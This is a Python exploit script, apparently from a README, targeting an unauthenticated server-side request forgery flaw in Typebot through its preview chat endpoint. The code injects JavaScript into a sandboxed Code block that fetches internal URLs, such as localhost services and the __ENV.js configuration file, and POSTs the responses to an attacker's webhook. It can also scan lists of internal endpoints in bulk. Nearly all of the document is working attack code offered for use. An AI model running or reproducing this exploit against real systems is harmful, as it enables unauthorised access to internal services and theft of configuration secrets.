README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2026-33712 - Typebot Unauthenticated SSRF Exploit
Typebot <= 3.15.2 - Unauthenticated SSRF via isolated-vm sandbox fetch
that bypasses validateHttpReqUrl() SSRF protection.
The fetch() inside the isolated-vm sandbox returns response.text() directly,
so the result is a string, not a Response object. Do NOT call .text() on it.
"""
import requests
import json
import sys
import urllib.parse
import argparse
import time
import random
import string
import os
import re
# Path of the endpoint list used by --scan; resolved relative to this script's
# own directory (not the current working directory).
ENDPOINTS_FILE = os.path.join(os.path.dirname(os.path.abspath(__file__)), "endpoints.txt")
def rand_id(length=6):
    """Return a random identifier of ``length`` lowercase letters and digits.

    The value only needs to be unique-looking, not unpredictable, so the
    non-cryptographic ``random`` module is sufficient here.
    """
    alphabet = string.ascii_lowercase + string.digits
    return "".join(random.choices(alphabet, k=length))
def js_escape(s):
    """Escape ``s`` for embedding inside a double-quoted JavaScript string literal.

    Backslashes are escaped first so that the backslashes introduced by the
    later replacements are not doubled again. Carriage returns are escaped
    alongside newlines because either one terminates a JS string literal.
    """
    return (
        s.replace("\\", "\\\\")
        .replace('"', '\\"')
        .replace("\n", "\\n")
        .replace("\r", "\\r")
    )
def build_payload(code):
    """Build the JSON body for a preview ``startChat`` request.

    Args:
        code: JavaScript source stored as the ``content`` option of the
            single ``Code`` block in the generated bot.

    Returns:
        A dict with a ``typebotId`` and an inline ``typebot`` definition made
        of a start group wired to a group holding the code block. Every id
        shares one random suffix so that the edge/block/group references
        stay consistent within a payload.
    """
    rid = rand_id()
    return {
        "typebotId": f"sr-{rid}",
        "typebot": {
            "version": "6",
            "id": f"bt-{rid}",
            "workspaceId": "test",
            "updatedAt": "2026-01-01T00:00:00.000Z",
            "groups": [
                {
                    "id": f"g1-{rid}", "title": "Start",
                    "graphCoordinates": {"x": 0, "y": 0},
                    "blocks": [
                        {"id": f"b1-{rid}", "type": "start", "label": "Start",
                         "outgoingEdgeId": f"e1-{rid}"}
                    ],
                },
                {
                    "id": f"g2-{rid}", "title": "Run",
                    "graphCoordinates": {"x": 200, "y": 0},
                    "blocks": [
                        {
                            "id": f"b2-{rid}", "type": "Code",
                            "outgoingEdgeId": f"e2-{rid}",
                            "options": {
                                "name": "SSRF",
                                "content": code,
                                "isExecutedOnClient": False,
                                "isUnsafe": True,
                            },
                        }
                    ],
                },
            ],
            "edges": [
                {"id": f"e1-{rid}", "from": {"blockId": f"b1-{rid}"},
                 "to": {"groupId": f"g2-{rid}"}}
            ],
            "events": [
                {"id": f"ev1-{rid}", "type": "start", "outgoingEdgeId": f"e1-{rid}",
                 "graphCoordinates": {"x": 0, "y": 0}}
            ],
            "variables": [{"id": f"v1-{rid}", "name": "r"}],
            "settings": {"general": {}},
            "theme": {"general": {}, "chat": {}},
        },
    }
def send_ssrf(base_url, code, timeout=20):
    """POST a payload built from ``code`` to the preview ``startChat`` endpoint.

    Args:
        base_url: Base URL of the instance; a trailing slash is tolerated.
        code: JavaScript source passed to ``build_payload``.
        timeout: Timeout in seconds handed to ``requests.post``.

    Returns:
        The decoded JSON object on success. On a transport failure, a
        non-JSON body, or a JSON body that is not an object, a dict of the
        form ``{"error": "<description>"}`` so callers can always treat the
        result as a dict.
    """
    payload = build_payload(code)
    endpoint = f"{base_url.rstrip('/')}/api/v1/typebots/{payload['typebotId']}/preview/startChat"
    headers = {"Content-Type": "application/json", "Accept": "application/json"}
    try:
        r = requests.post(endpoint, json=payload, headers=headers, timeout=timeout)
    except requests.exceptions.RequestException as e:
        return {"error": str(e)}
    try:
        data = r.json()
    except ValueError as e:
        # Older requests versions raise a plain ValueError subclass here that
        # is not a RequestException (e.g. an HTML error page from a proxy).
        return {"error": f"non-JSON response (HTTP {r.status_code}): {e}"}
    if not isinstance(data, dict):
        # Callers use ``.get`` and key lookups, so never hand back a list/scalar.
        return {"error": f"unexpected JSON response (HTTP {r.status_code}): {json.dumps(data)[:80]}"}
    return data
def preflight_check(base_url, webhook=None, timeout=15):
    """Probe the target and classify its response.

    Args:
        base_url: Base URL of the instance to probe.
        webhook: Optional URL; when given, the probe code also POSTs the
            first 100 characters of the fetched body to it.
        timeout: Timeout in seconds passed through to ``send_ssrf``.

    Returns:
        One of ``'vulnerable'``, ``'patched'``, ``'endpoint_missing'``, or a
        free-form string starting with ``'error: '`` or ``'unexpected: '``.
    """
    wh_callback = ""
    if webhook:
        wh_callback = f"""
await fetch("{webhook}", {{
method: "POST",
headers: {{"Content-Type": "text/plain"}},
body: "preflight-ok: " + (typeof r === "string" ? r.substring(0,100) : (await r.text()).substring(0,100))
}});
"""
    code = f"""
try {{
var r = await fetch("http://127.0.0.1:3000/");{wh_callback}
}} catch(e) {{}}
var x = 1;
"""
    resp = send_ssrf(base_url, code, timeout)
    if "sessionId" in resp:
        return "vulnerable"
    # Only a non-empty string message is searched directly; anything else
    # (missing, empty, or a nested object) falls back to the serialized response
    # so the substring checks below never run against a non-string.
    message = resp.get("message")
    msg = message if isinstance(message, str) and message else json.dumps(resp)
    if "UNAUTHORIZED" in msg or "You must be logged in" in msg:
        return "patched"
    if "NOT_FOUND" in msg or "Not found" in msg:
        return "endpoint_missing"
    if "error" in resp:
        # The server may return a structured error object rather than a string.
        return f"error: {str(resp['error'])[:80]}"
    return f"unexpected: {json.dumps(resp)[:100]}"
def exfiltrate(base_url, internal_url, webhook, label="", timeout=20):
    """Send code that fetches ``internal_url`` and POSTs the body to ``webhook``.

    Args:
        base_url: Base URL of the instance the request is sent to.
        internal_url: URL fetched by the generated code; escaped with
            ``js_escape`` before being embedded.
        webhook: URL that receives the fetched body (or, on failure, a GET
            with an ``err_<label>`` query parameter).
        label: Prefix identifying the result; defaults to ``internal_url``.
            It is percent-encoded so it is safe in both the string literal
            and the error query string.
        timeout: Timeout in seconds passed through to ``send_ssrf``.

    Returns:
        Whatever ``send_ssrf`` returns for the request.
    """
    safe = js_escape(internal_url)
    l_escaped = urllib.parse.quote(label or internal_url, safe="")
    code = f"""
try {{
var r = await fetch("{safe}");
var b = typeof r === "string" ? r : await r.text();
await fetch("{webhook}", {{
method: "POST",
headers: {{"Content-Type": "text/plain"}},
body: "{l_escaped}: " + b
}});
}} catch(e) {{
await fetch("{webhook}?err_{l_escaped}=" + encodeURIComponent(e.toString().substring(0,200)));
}}
"""
    return send_ssrf(base_url, code, timeout)
def ensure_scheme(url):
    """Return ``url`` with ``http://`` prepended when it has no HTTP(S) scheme.

    Empty or ``None`` input is returned unchanged. The scheme test is
    case-insensitive, so ``HTTPS://host`` is recognised as already having one.
    """
    if not url:
        return url
    if url.lower().startswith(("http://", "https://")):
        return url
    return f"http://{url}"
def detect_viewer_url(target, timeout=15):
    """Look for ``NEXT_PUBLIC_VIEWER_URL`` in the target's ``/__ENV.js``.

    Args:
        target: Host or URL to probe; a scheme is added if missing.
        timeout: Timeout in seconds for the GET request.

    Returns:
        The captured URL string, or ``None`` when the request fails, the
        status is not 200, or the key is not present in the body.
    """
    url = ensure_scheme(target).rstrip("/") + "/__ENV.js"
    try:
        r = requests.get(url, timeout=timeout)
    except requests.exceptions.RequestException:
        # Detection is best-effort: the caller falls back to the given target.
        return None
    if r.status_code != 200:
        return None
    m = re.search(r'NEXT_PUBLIC_VIEWER_URL["\']?:\s*["\']([^"\']+)["\']', r.text)
    if not m:
        return None
    viewer = m.group(1)
    print(f"[+] Detected viewer URL from __ENV.js: {viewer}")
    return viewer
def load_endpoints():
    """Load endpoint URLs from ``ENDPOINTS_FILE`` (one per line, blanks ignored).

    Returns:
        A list of ``(url, original_line)`` tuples, where ``url`` has a scheme
        added if the line lacked one. An empty list is returned, with a
        message on stderr, when the file does not exist.
    """
    try:
        # Open directly instead of checking existence first, so there is no
        # window between the check and the read.
        with open(ENDPOINTS_FILE, encoding="utf-8") as f:
            entries = [line.strip() for line in f]
    except FileNotFoundError:
        print(f"[-] Endpoints file not found: {ENDPOINTS_FILE}", file=sys.stderr)
        return []
    return [(ensure_scheme(entry), entry) for entry in entries if entry]
def scan_targets(base_url, targets, webhook, delay=0.3):
    """Run ``exfiltrate`` for each target in turn and print a status line.

    Args:
        base_url: Base URL of the instance requests are sent to.
        targets: Sequence of ``(url, description)`` pairs.
        webhook: URL handed to ``exfiltrate`` for each target.
        delay: Seconds to sleep after every request.
    """
    total = len(targets)
    for position, (url, desc) in enumerate(targets, start=1):
        label = f"[{position}/{total}] {desc}"
        print(f" {label:50s} {url}", end=" ", flush=True)
        resp = exfiltrate(base_url, url, webhook, label)
        if "sessionId" in resp:
            print("OK")
        elif "error" in resp:
            # The error value may be a structured object, not a string.
            print(f"FAIL: {str(resp['error'])[:60]}")
        else:
            s = json.dumps(resp)
            print(f"UNEXPECTED: {s[:80]}")
        time.sleep(delay)
def main():
    """Command-line entry point.

    Parses arguments, optionally swaps the target for the viewer URL found
    in ``/__ENV.js``, runs the pre-flight probe, and then either scans every
    URL from endpoints.txt (``--scan``) or fetches the single ``--url``.
    Exits with status 1 on missing arguments, an empty endpoint list, or a
    non-vulnerable pre-flight result unless ``--force`` is given.
    """
    parser = argparse.ArgumentParser(
        description="CVE-2026-33712 - Typebot Unauthenticated SSRF Exploit",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
# Single URL
%(prog)s -t https://bot.example.com -u http://127.0.0.1:3000/__ENV.js -w https://webhook.site/your-uuid
# Scan all endpoints from endpoints.txt
%(prog)s -t https://bot.example.com -w https://webhook.site/your-uuid --scan
# Auto-detect viewer URL from builder's __ENV.js
%(prog)s -t https://builder.example.com -w https://webhook.site/your-uuid --detect-viewer --scan
# Single test with output to endpoint
%(prog)s -t https://bot.example.com -u http://typebot-builder:3000/ -w https://webhook.site/your-uuid
""",
    )
    parser.add_argument("-t", "--target", required=True, help="Vulnerable Typebot instance URL (e.g. https://bot.example.com)")
    parser.add_argument("-u", "--url", help="Internal URL to fetch via SSRF")
    parser.add_argument("-w", "--webhook", default=os.environ.get("WEBHOOK_URL"),
                        help="Webhook URL for data exfiltration (or set WEBHOOK_URL env var)")
    parser.add_argument("--scan", action="store_true",
                        help="Scan all URLs from endpoints.txt")
    parser.add_argument("--detect-viewer", action="store_true",
                        help="Auto-detect viewer URL from builder's __ENV.js and use it as target")
    parser.add_argument("--force", action="store_true",
                        help="Skip pre-flight checks and force execution")
    parser.add_argument("--timeout", type=int, default=20, help="Request timeout in seconds (default: 20)")
    parser.add_argument("--delay", type=float, default=0.3, help="Delay between scan requests (default: 0.3)")
    args = parser.parse_args()
    args.target = ensure_scheme(args.target)

    # Auto-detect viewer URL from builder
    if args.detect_viewer:
        print(f"[*] Probing: {args.target}")
        viewer = detect_viewer_url(args.target, args.timeout)
        if viewer:
            args.target = ensure_scheme(viewer)
        else:
            print("[-] Could not detect viewer URL, using target as-is")
    print(f"[*] Target: {args.target}")

    if not args.webhook:
        print("[-] Error: --webhook / -w is required (or set WEBHOOK_URL env var)")
        print(" Get one at https://webhook.site")
        sys.exit(1)
    print(f" Webhook: {args.webhook}")
    print()

    # Pre-flight check
    print("[*] Pre-flight: probing target...", end=" ", flush=True)
    status = preflight_check(args.target, args.webhook, args.timeout)
    print(status)
    if status == "vulnerable":
        print("[+] Target appears VULNERABLE! Proceeding...")
    else:
        # Every non-vulnerable outcome prints its own explanation and then
        # shares the same rule: stop unless --force was given.
        if status == "patched":
            print("[-] Target is patched (auth required). SSRF not exploitable.")
        elif status == "endpoint_missing":
            print("[-] Endpoint not found. Target may be the builder (not viewer), wrong version, or wrong URL.")
            print(" Try --detect-viewer if this might be the builder.")
        else:
            print(f"[-] {status}")
        if not args.force:
            sys.exit(1)
    print()

    # Scan mode
    if args.scan:
        targets = load_endpoints()
        if not targets:
            print("[-] No endpoints found. Make sure endpoints.txt exists with valid URLs.")
            sys.exit(1)
        print(f"[*] Scanning {len(targets)} endpoints from endpoints.txt...\n")
        scan_targets(args.target, targets, args.webhook, args.delay)
        print(f"\n[*] Done. Check your webhook ({args.webhook}) for results.")
        return

    # Single URL mode
    if not args.url:
        print("[-] Error: --url / -u is required, or use --scan to read from endpoints.txt")
        sys.exit(1)
    args.url = ensure_scheme(args.url)
    print(f"[*] Fetching: {args.url}")
    # Honour --timeout here as well; previously the default of 20s was always used.
    resp = exfiltrate(args.target, args.url, args.webhook, timeout=args.timeout)
    if "sessionId" in resp:
        print("[+] Request sent. Check webhook for response body.")
    else:
        print(f"[-] Failed: {json.dumps(resp)[:200]}")
# Run the CLI only when executed as a script, not when imported.
if __name__ == "__main__":
    main()